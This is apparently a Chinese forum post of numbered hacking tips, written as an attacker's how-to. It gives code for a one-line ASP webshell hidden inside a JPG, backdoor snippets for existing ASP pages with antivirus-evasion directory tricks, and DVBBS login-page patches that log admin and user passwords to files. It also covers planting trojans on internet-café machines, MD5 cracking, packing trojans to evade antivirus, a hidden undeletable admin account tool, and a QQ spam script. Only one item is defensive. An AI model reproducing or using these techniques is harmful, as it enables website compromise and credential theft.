1.名稱：如何制作圖片ASP木馬 （可顯示圖片）
建一個asp文件，內容為<!--＃i nclude file="ating.jpg"-->
找一個正常圖片ating.jpg，插入一句話木馬（比如冰狐的）,用ultraedit進行hex編譯，插入圖片里，為
了運行成功，還要搜索<%和％>,將其變?yōu)?0,(不要替換自己asp的),再把jpg文件開頭加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#) ) </SCRIPT> 2. 名稱：整蠱網吧
先用精銳網吧輔助工具得到用戶名和密碼，然后用計算機管理聯(lián)結一臺機器，開telnet,連接，開共享， 復制一個木馬過去運行即可。 3．名稱：感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成庫 "rtgen md5 byte 1 7 5 2400 40000 all"
1和7代表密碼最小和最大長度
阿汀我再加個方法：http://md5.rednoize.com/ 在線破解
或者到http://www.md5lookup.com/?category=01-3&;searck=on 4.很多時候我們做免殺木馬，不用懂匯編，用北斗加殼程序就能逃殺，還有很多加殼軟件，大家木馬加殼 的時候最好多選擇不知名的加殼軟件 5．名稱：隱蔽的插入型ASP木馬
(1)在我們要做手腳的asp文件里加入如下內容
<%if request("action")="ok" then%>
shell代碼插在這里，最好是小馬，還要加密一下
<%end if%>
訪問的時候在你作手腳的asp文件后面加上?action=ok,即可
(2)另一種方法，在我們要做手腳的asp文件里加入如下內容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
訪問的時候在做手腳的asp文件后面加上?filer=XXX
XXX為你本地上傳的一個路徑如 c:ating123.asp
上傳后在做手腳的asp的同文件夾中有ating,asp
（3）前提得到system權限，
進入網站目錄下一層
mkdir s…
copy ating.asp s…/
這樣殺毒軟件找不到的
訪問http://網站/s…/ating.asp即可 6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar，此工具在該電腦生成一個超級用戶 用戶名為： hack 密碼110，在DOS下和計算機管理器上看不到你建立的用戶，并且是刪除不掉的 7．名稱：QQ群腳本攻擊
打開qq對話誆，復制消息，然后
下面的內容保存為.vbs 文件，運行即可
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻擊腳本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next 8．搜索：程序制作：萬鵬 有免費申請空間的，直接上傳asp馬即可 9. 名稱：全面找出你站上的ASP木馬
（1） 用殺毒軟件
（2） 用FTP客戶端軟件，點"工具"->"比較文件夾"
（3） 用asplist2.0.asp上傳到站點空間查看，一般功能多的ASP我估計就是ASP木馬
（4） 用工具Beyond Compare 10名稱：拓展思路拿DVBBS帳號 "一個人的圣經"的動畫
（1）以前獲得webshell后想進入DVBBS的后臺,想要管理員的密碼，可以這樣
老辦法:
修改admin_login.asp得到明文DVBBS后臺密碼
在"username=trim(replace(request("username")這行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理員登陸后臺，在目錄下就生成了laner.txt
（2）login.asp中Case "login_chk"下:
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
這樣laner.asp將獲得全部登陸人的登陸時間，用戶名和密碼
（3）如果你有自己的網站或者另外的webshell(強烈建議使用):
可以建立目錄laner,在里面建立一個空的laner.asp和如下代碼的rain.asp:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>

最新評論